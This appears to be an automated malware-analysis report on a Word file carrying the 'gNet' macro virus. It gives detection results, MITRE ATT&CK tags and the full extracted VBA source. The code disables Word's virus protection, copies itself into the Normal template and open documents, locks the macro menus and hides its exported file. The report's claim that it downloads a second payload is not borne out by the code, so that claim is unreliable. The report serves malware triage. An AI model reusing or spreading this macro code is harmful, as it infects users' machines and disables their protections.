Verdict: MALICIOUS
Risk Score: 200
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
T1547.001 Registry Run Keys / Startup Folder
The sample is a Word document with VBA macros, identified as the 'gNet' macro virus. The macros contain a Shell() call to execute 'attrib +h gnet.vxd', indicating an attempt to hide a downloaded payload. The script also attempts to export itself to 'c:\gnet.vxd' and potentially establish persistence, suggesting it acts as a downloader for a secondary malicious artifact.
Heuristics (3)
- ClamAV: Doc.Trojan.VMPCK1-12 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.VMPCK1-12
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2195 bytes |

SHA-256: 58ca35c34c3482540bba9b184f8c5625a96abc0083fa77db4f2c804b0d607bad
Detection: ClamAV: Doc.Trojan.VMPCK1-12
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "gnet"
' This is gNet Macro Virus
' (c) 1999 by ksg
' astigmatiZm virus group
' www.astigmatiZm.cjb.net
' rename this file to gNet.bas and import it in MS Words Visual Basic Editor to activate
'
' WM97.gNet
' ---------------------
' (c) by KSG [ AMACC ]
' ---------------------
' [ Astig Matizm ]
'
Sub gnet()
On Error Resume Next
Set a = NormalTemplate: Set b = a.VBProect
Set c = b.VBComponents(1): Set d = c.Item
Set vp = Options.VirusProtection
Options.ConfirmConversions = False
vp = (Rnd * 0)
Options.SaveNormalPrompt = (Rnd * 0)
b.VBComponents("gnet").Export "c:\gnet.vxd"
ActiveDocument.ReadOnlyRecommended = False
If d("gnet").Name <> "gnet" Then
NotYet = True
If ActiveDocument.VBProject.VBComponents.Item("gnet").Name <> "gnet" Then Still = True
If NotYet = True And Still = False Then Set Blink1 = NormalTemplate.VBProject.VBComponents
If NotYet = False And Still = True Then Set Blink1 = ActiveDocument.VBProject.VBComponents
Blink1.import "c:\gnet.vxd"
If activeinst = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If Still = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
CommandBars("tools").Controls("Macro").Enabled = False
CommandBars("tools").Controls("Customize...").Enabled = False
CommandBars("view").Controls("Toolbars").Enabled = False
CommandBars("view").Controls("Status Bar").Enabled = False
Shell "attrib +h gnet.vxd", vbHide
End Sub
Sub AutoExec()
On Error Resume Next
If Day(Now()) = 10 And Month(Now()) = 9 Then
Call HelpAbout
End If
Call gnet
End Sub
Sub HelpAbout()
On Error Resume Next
Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "g N e t , 2 1 , k s g"
.Heading = "gNeT [ ksg / astigmatiZm ]"
.Animation = msoAnimationSearching
.Show
End With
Assistant.Visible = False
Call gnet
End Sub